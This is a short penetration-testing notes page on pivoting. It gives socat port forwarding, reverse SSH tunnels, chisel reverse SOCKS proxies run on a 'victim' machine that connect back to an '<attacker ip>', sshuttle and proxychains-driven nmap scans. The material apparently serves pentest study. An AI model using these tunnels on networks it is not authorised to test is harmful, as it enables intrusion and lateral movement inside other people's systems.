Pivoting

Port Forwarding

The goal is to redirect packet from one port to another port.



# from ipv4 to ipv6, all packet to localhost:445 will direct to <ipv6>:445
sudo socat TCP-LISTEN:445, fork TCP:<ipv6>:445

ssh to kali machine

note:

local-port and local-machine in the kali machine (attacker)

ssh -R -N <local-port>:127.0.0.1:<service-port> root@<local-machine>

Reverse Proxy

chisel

ref: https://www.youtube.com/watch?v=dIqoULXmhXg

Attacker (Kali)

./chisel server -p 8000 --reverse

Run in Victim Machine

Windows

chisel.exe client <attacker ip>:8000 R:socks

Linux

./chisel client <attacker ip>:8000 R:sockss

Config the proxychains (Attacker)

change /etc/proxychains4.conf

[ProxyList]
socks5 127.0.0.1 1080

Run command

proxychains nmap -sT -p 88 -Pn -n <machine 2 ip>

sshuttle

Need (user login as ssh)

# single
sshuttle -r username@remotehost 0.0.0.0/0
# example
sshuttle user@192.168.20.35 192.168.30.0/24

sshuttle -r root@10.1.1.1 10.2.2.0/24

SSH Tunnel

nice ref:https://www.isabekov.pro/reverse-ssh-tunnel/

Can't ssh to machine?

ssh -p 22 -R "<attacker port>:<host port>

Forward Proxy

chisel

sshuttle

SSH Tunnel (Recommended if you wanna access internal port)

Forward Proxy

Need SSH to machine:

ssh -D <local port> <user>@<IP of victim you have>

#example 
ssh -D 8989 local@10.10.10.10

It mean, every packet to 127.0.0.1:8989 will be forwarded as IP 10.10.10.10

You can set proxy on your browser or proxychains.conf

[Manual Proxy]
socks4 127.0.0.1 8989

Don't forget to using incognito to your browser or clear cache, for better process.

If that internal port have vhost configuration, you must set up that /etc/hosts on kali linux with pointing to local port (/etc/hosts on victim machine).

Case of forward proxy

Are you stuck?

Network Pentest with Chisel

https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-chisel-proxies

PreviousImpersonate Token NextPivot in a Case

Last updated 1 year ago